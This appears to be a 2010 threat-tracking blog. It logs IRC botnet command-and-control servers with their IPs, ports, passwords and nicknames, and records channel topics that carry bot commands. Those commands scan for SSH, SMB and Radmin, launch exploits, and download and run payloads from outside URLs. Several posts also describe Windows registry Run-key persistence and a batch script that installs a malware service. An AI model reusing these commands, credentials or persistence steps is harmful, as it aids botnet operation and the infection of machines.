Thursday, December 23, 2010

irc.wanger.biz (Yewnix)

irc.wanger.biz:8782
46.4.232.76:8782
Nick: :{00-USA-XP-pc7-7123}
Username: blaze
Server Pass: weed
Joined Channel: #sshscan2
Channel Topic for Channel #sshscan2: ".scan sshgodscan 38 8 0 192.x.x.x -n -b |.scan sshgodscan 30 8 0 141.x.x.x -n -b |.scan sshgodscan 30 8 0 218.x.x.x -n -b"
Set by Yewnix on Tue Dec 21 20:50:57
Private Message to User {iNF-00-USA-XP-p\xb8\x8cI: "SC// Random Port Scan started on 218.x.x.x:22 with a delay of 8 seconds for 0 minutes using 30 threads."
Private Message to User {iNF-00-USA-XP-p\xb8\x8cI: "SC// Random Port Scan started on 192.x.x.x:22 with a delay of 8 seconds for 0 minutes using 38 threads."
Private Message to User {iNF-00-USA-XP-p\xb8\x8cI: "SC// Random Port Scan started on 141.x.x.x:22 with a delay of 8 seconds for 0 minutes using 30 threads."

HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Run\​
Windows Data Serivce system32.exe
C:\WINDOWS\system32.exe

Posted by Role at 1:10 AM 0 comments  

Sunday, December 19, 2010

aaaaaaaa.schooluni.us (bfbot) &(rxbot)

Found 2 addresses
addr: aaaaaaaa.schooluni.us ip: 109.196.130.66
addr: aaaaaaaa.schooluni.us ip: 109.196.130.50

aaaaaaaa.schooluni.us:7196
PASS laorosr
Channel#dpi
Channel#!
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://61.136.59.34/mobi.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by nonSTOPspread66 on Sat Dec 18 23:19:01

Process
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVer.\​policies\​Explorer\​Run\​
Microsoft Driver Setup
C:\WINDOWS\gwdrive32.exe

Posted by Role at 5:18 AM 0 comments  

Friday, December 17, 2010

im.maximum-irc.info

im.maximum-irc.info

Found 4 addresses
addr: im.maximum-irc.info ip: 119.202.198.117
addr: im.maximum-irc.info ip: 139.91.102.100
addr: im.maximum-irc.info ip: 139.91.102.101
addr: im.maximum-irc.info ip: 150.165.168.123
im.maximum-irc.info:9595
139.91.102.101:9595
Nick: [USA|00|XP|P|48168]
Username: ywzyhaf
Server Pass: Peja0444@
Joined Channel: #!!IM!! with Password fatj00
Channel Topic for Channel #!!IM!!: ".dl.start http://dl.dropbox.com/u/14684555/r.exe C:\r.exe 1 -s"

HKLM\​SOFTWARE\​Microsoft\​Windows NT\​CurrentVersion\​Terminal Server\​Install\​Software\​Microsoft\​Windows\​CurrentVersion\​Run\
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Run\​
Windows winlogin.exe
C:\WINDOWS\winlogin.exe

Posted by Role at 7:12 PM 0 comments  

bean.F-QACS.INFO

bean.F-QACS.INFO:5337
178.162.175.63:5337
Nick: [NEW][USA]72014
Username: [NEW][USA]72014
Joined Channel: #ed

HKU\​S-1-5-21-842925246-1425521274-308236825-500\​SOFTWARE\​MICROSOFT\​WINDOWS\​CURRENTVERSION\​RUN
Windows Service Host
C:\Documents and Settings\Administrator\Application Data\svchost.exe

Posted by Role at 7:08 PM 0 comments  

flash.quickupdates.net (Yewnix)

flash.quickupdates.net:5337
46.4.232.76:5337
Nick: :{00-USA-XP-pc3-3370}
Username: blaze
Joined Channel: #join with Password error
Channel Topic for Channel #join: ".aSc -S |.sub |.wu |.worm |.scan svrsvc_BRUTE 45 20 100 -r -b -e -s |.scan SVRSVC_ESP 35 3 0 -b -r -e -s |.scan SVRSVC_ESP_SP2 35 3 0 -b -r -e -s |.scan SVRSVC_ARG 35 3 0 -b -r -e -s |.scan SVRSVC_ARG_SP2 35 3 0 -b -r -e -s |.scan SVRSVC_RUS 35 3 0 -b -r -e -s |.scan SVRSVC_RUS_SP2 35 3 0 -b -r -e -s"

HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Run\​ info
Windows Data Serivce C:\WINDOWS\services.exe

Posted by Role at 7:04 PM 0 comments  

Wednesday, November 3, 2010

pig.botsgod.info

Botnet C&C irc
Found 3 addresses
addr: pig.botsgod.info ip: 217.70.188.30
addr: pig.botsgod.info ip: 92.243.28.194
addr: pig.botsgod.info ip: 95.142.163.184

pig.botsgod.info:5900
User Name: VirUs
Real Name: Iam_PIG_And_Iam_A_GAY0003
Password: isPigaGAY
Nick Name: [USA][XP-SP3]371106
Channel:##ENC##
Password:Pig_IS_STUPID

Topic is '!NL FRRN%^^UUU]QGRCN?J?AC]A3K^NPCEW^BAVN`]HNCE QQBQBC]CVC | !NL FRRN%^^QCPTCP\B?R?]2CR^G2QR?JJ]}#"~~]CVC ?QBQB]CVC | !NL FRRN%^^NP3K3SN]G2D3^QCRSN"`~]CVC QBQBBB]CVC | !NL FRRN%^^Q3DRU?PCU3PI]2CR^G2QR?JJ]}#"~~]CVC ufuf]gzg'
* Set by xXx on Wed Nov 03 17:52:13

Creates value "Microsoft UneXpected"="C:\TEMP\mtfsys32.exe" in key "
HKLM\Software\Microsoft\Windows\CurrentVersion\Run".
Creates a mutex PigGotFucKedManyTimesAndAlreadyProvedHimGay.
Creates process "mtfsys32.exe".

malware url
http://www.sitepalace.com/pregy/ENCS1p1.jpeg

Posted by Role at 8:26 AM 0 comments  

Tuesday, July 6, 2010

gangbang.mytijn.org ( ssh2 )

gangbang.mytijn.org DNS_TYPE_A 98.156.90.172 85.92.87.233
98.156.90.172:43000
Botnet C&C irc
Nick: |KOR|XP|00|803303|
Username: SP3-443
Server Pass: scary
Joined Channel: #!ssh with Password ERROR
Channel Topic for Channel #!ssh: ".aSc ssh 40 8 0 85.x.x.x -b -r -s |.aSc ssh 40 8 0 85.x.x.x -b -r -s |.aSc ssh 40 8 0 86.x.x.x -b -r -s"

Startup
Services Created:
Name Type Path
Windows System Updates SERVICE_AUTO_START "C:\Documents and Settings\Administrator\Application Data\exxploiter.exe"

Posted by Role at 7:23 PM 0 comments  

Saturday, July 3, 2010

irc.metraiciono.com

irc.metraiciono.com DNS_TYPE_A 95.211.84.164

95.211.84.164:6567
Botnet C&C irc
Nick: [SI|AUT|00|P|04244]
Username: XP-5923
Server Pass: pr1v4d0onl1n3r
Joined Channel: #canal1# with Password c1rc0s0leil
Channel Topic for Channel #canal1#: ".desfi http://174.121.2.222/~toxicok/wp-content/languages/home.exe c:\WINDOWS\home.exe 1"
Private Message to Channel #canal1#: "[Dl]: File download: 128.0KB to: c:\WINDOWS\home.exe @ 64.0KB/sec."
Private Message to Channel #canal1#: "[Dl]: Created process: "c:\WINDOWS\home.exe", PID: <448>"

Startup
HKLM\​SOFTWARE\​Microsoft\​Windows NT\​CurrentVersion\​Terminal Server\​Install\​Software\​Microsoft\​Windows\​CurrentVersion\​Run\​
info Ci Servs Sontiwin.exe
HKLM\​SOFTWARE\​Microsoft\ ​Windows\​CurrentVersion\​Run\​
info Ci Servs Sontiwin.exe

Posted by Role at 9:27 PM 0 comments  

Friday, July 2, 2010

l33t.shadow-mods.net ( RadXScan )

l33t.shadow-mods.net:6667
91.121.78.121:6667

Botnet C&C irc
channel:##konvit-rad##
key:f00kU


Startup
rem ### SERVICE CONFIG FILE ###
SET CONFIG=Service.dll
IF EXIST %CONFIG% EXIT
ECHO>%CONFIG% [Settings]
ECHO>>%CONFIG% ServiceName=svcfost
ECHO>>%CONFIG% CheckProcessSeconds=60
ECHO.>>%CONFIG%
ECHO>>%CONFIG% [Process0]
ECHO>>%CONFIG% CommandLine=svchost.exe
ECHO>>%CONFIG% WorkingDir=%CD%\
ECHO>>%CONFIG% PauseStart=1000
ECHO>>%CONFIG% PauseEnd=1000
ECHO>>%CONFIG% UserInterface=No
ECHO>>%CONFIG% Restart=Yes

service -i
net start svcfost

Posted by Role at 7:22 PM 0 comments  

irc.bigshitsandwich.org ( RadXScan )

irc.bigshitsandwich.org:6667
83.170.84.20:6667

Botnet C&C irc
Channel:#mp3-ops
key:fuckU
* Topic is '.scan 77'
* Set by doom on Sat Jul 03 07:58:54

[Scan] [Complete] [Range: 77.244.0.0-77.244.255.255] [DigiX]
[ReScan] [Initiated] [DigiX]
[Scan] [Range: 77.106.0.0-77.106.255.255] [DigiX]
[Found Radmin] [Info: 77.126.12.173/No Pass] [DigiX]

startup
rem ### SERVICE CONFIG FILE ###
SET CONFIG=Service.dll
IF EXIST %CONFIG% EXIT
ECHO>%CONFIG% [Settings]
ECHO>>%CONFIG% ServiceName=svcfost
ECHO>>%CONFIG% CheckProcessSeconds=60
ECHO.>>%CONFIG%
ECHO>>%CONFIG% [Process0]
ECHO>>%CONFIG% CommandLine=Radx.exe
ECHO>>%CONFIG% WorkingDir=%CD%\
ECHO>>%CONFIG% PauseStart=1000
ECHO>>%CONFIG% PauseEnd=1000
ECHO>>%CONFIG% UserInterface=No
ECHO>>%CONFIG% Restart=Yes

service -i
net start svcfost

Posted by Role at 5:30 PM 0 comments  

Thursday, July 1, 2010

gangbang.mytijn.org

gangbang.mytijn.org
DNS_TYPE_A
85.92.87.233
98.156.90.172


85.92.87.233:25343

Botnet C&C irc
Nick: :|XP|00|AUT|79994
Username: PotHead
Server Pass: scary
Joined Channel: #Main# with Password ERROR
Channel Topic for Channel #Main#: ".scan RUS 35 3 0 -b -s"

Startup
HKLM\​SOFTWARE\​Microsoft\​Windows\​ CurrentVersion\​Run\​
info cRSCS crscs.exe

Posted by Role at 5:47 AM 0 comments  

Wednesday, June 30, 2010

ulove.tigolbittys.info

Domains and Sub Domains
ilove.tigolbittys.info
ulove.tigolbittys.info
free.tinypicbox.com
one.tinypicbox.com

ulove.tigolbittys.info DNS_TYPE_A
178.32.55.3
83.15.10.202
91.121.78.121
178.32.48.79
178.32.49.4

Botnet C&C irc

83.15.10.202:7171

psyBNC2.3.2-7
Connected. Now logging in...
User Anonymous logged in.
-
Your IRC Client did not support a password. Please type /QUOTE PASS your password to connect.

Nick: [00|AUT|148343]
Username: XP-9617
Server Pass: fuck3d

Channel: #links#
Channel: #hp#

Topic is '^run.stop -s|^run http://dessertsrecipes.net/katrian/shell/r.exe c:\45jknl.exe 1|^asc -S -s|^http http://dessertsrecipes.net/katrian/shell/h.exe|^asc svrsvc_all 30 3 0 -e -b -s'
Set by ajlk on Wed Jun 30 05:55:57

Startup
HKLM\​SOFTWARE\​Microsoft\​Windows\​ CurrentVersion\​Run\​
info Windows Notify Service wntfy.exe

Posted by Role at 11:13 PM 0 comments  

updat1.bejsis.com

Botnet C&C IRC
210.170.62.106:1234
Nick: n[AUT|XP]6732262
Username: 9142
Joined Channel: #dl#

Start up
HKLM\​SOFTWARE\​Microsoft\​Windows NT\​CurrentVersion\​Winlogon\​
info Userinit C:\​WINDOWS\​system32\​ userinit.exe,C:\​WINDOWS\​redfil.exe

Posted by Role at 3:46 AM 0 comments  

Tuesday, June 29, 2010

java.KUTLUFAMILY.COM

java.KUTLUFAMILY.COM
88.255.104.172:81
Botnet C&C irc
Nick: [00_AUT_XP_1113366]
Username: SP3-899
Joined Channel: #kk with Password ^B^B^B^B
Channel Topic for Channel #kk: ".asc -S -s |.http http://94.76.194.116/k.exe |.asc exp_all 10 5 0 -c -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 5 5 0 -c |.down -S |.down http://94.76.194.116/bro.jpg c:\y2b3k2i6x6b9.exe c:\y2b3k2i6x6b9.exe -r -h"
Private Message to Channel #kk: "scan; Trying to get external IP."
Private Message to Channel #xs: "HTTP SET http://94.76.194.116/k.exe"
Private Message to Channel #kk: "scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 5 threads."
Private Message to Channel #kk: "scan; Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads."
Private Message to Channel #kk: "scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 10 threads."

Startup
HKLM\​SOFTWARE\​Microsoft\​Windows\​ CurrentVersion\​Run\​
info Microsoft Driver Setup C:\​WINDOWS\​system32\​Zsnkstm.exe
HKLM\​SOFTWARE\​Microsoft\ ​Windows\​CurrentVersion\​policies\​Explorer\​Run\​
info Microsoft Driver Setup C:\​WINDOWS\​system32\​Zsnkstm.exe

Posted by Role at 10:02 PM 0 comments  

Friday, June 25, 2010

ms4alllll.tecBoom.com

ms4alllll.tecBoom.com:47221

Botnet C&C irc
o49949 changes topic to '.asc -S|.asc exp_all 25 2 0 -a -r|.asc exp_all 25 2 0 -b -r|.asc exp_all 25 2 0 -c'
* o49949 changes topic to 'finito'

Channels
/jojo #dpi
/jojo #a

.asc -S|.http http://208.53.183.164/httpd.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 25 5 0 -b|.asc exp_all 25 5 0 -c

Channel #-: ".asc -S|.http http://208.53.183.162/ma32ol.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 25 5 0 -b|.asc exp_all 25 5 0 -c"

Private Message to Channel #i: "HTTP SET http://208.53.183.162/ma32ol.exe" Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads." Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads." Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads." Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Trying to get external IP."

so that cndrive32.exe runs every time Windows starts
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
Microsoft Driver Setup = "%Windir%\cndrive32.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Microsoft Driver Setup = "%Windir%\cndrive32.exe"

Posted by Role at 12:07 AM 0 comments  

Subscribe to: Posts (Atom)
Powered by Blogger